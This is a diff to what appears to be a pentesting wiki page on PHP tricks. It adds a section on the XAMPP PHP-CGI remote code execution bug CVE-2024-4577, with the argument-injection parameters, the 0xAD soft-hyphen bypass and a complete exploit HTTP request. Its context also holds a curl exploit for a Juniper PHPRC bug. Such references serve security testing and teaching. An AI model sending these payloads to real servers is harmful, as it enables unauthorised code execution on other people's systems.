GITBOOK-4368: No subject

network-services-pentesting/pentesting-web/php-tricks-esp/README.md

@@ -336,6 +336,31 @@ If you find a vulnerability that allows you to **modify env variables in PHP** (
     * `curl "http://10.12.72.1/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'`
   * Technique [**from this report**](https://vulncheck.com/blog/juniper-cve-2023-36845).
 
+### XAMPP CGI RCE - CVE-2024-4577
+
+The webserver parses HTTP requests and passes them to a PHP script executing a request such as as [`http://host/cgi.php?foo=bar`](http://host/cgi.php?foo=bar\&ref=labs.watchtowr.com) as `php.exe cgi.php foo=bar`, which allows a parameter injection. This would allow to inject the following parameters to load the PHP code from the body:
+
+```jsx
+-d allow_url_include=1 -d auto_prepend_file=php://input
+```
+
+Moreover, it's possible to inject the "-" param using the 0xAD character due to later normalization of PHP. Check. the exploit example from [**this post**](https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/):
+
+```jsx
+POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
+Host: {{host}}
+User-Agent: curl/8.3.0
+Accept: */*
+Content-Length: 23
+Content-Type: application/x-www-form-urlencoded
+Connection: keep-alive
+
+<?php
+phpinfo();
+?>
+ 
+```
+
 ## PHP Static analysis
 
 Look if you can insert code in calls to these functions (from [here](https://www.youtube.com/watch?v=SyWUsN0yHKI\&feature=youtu.be)):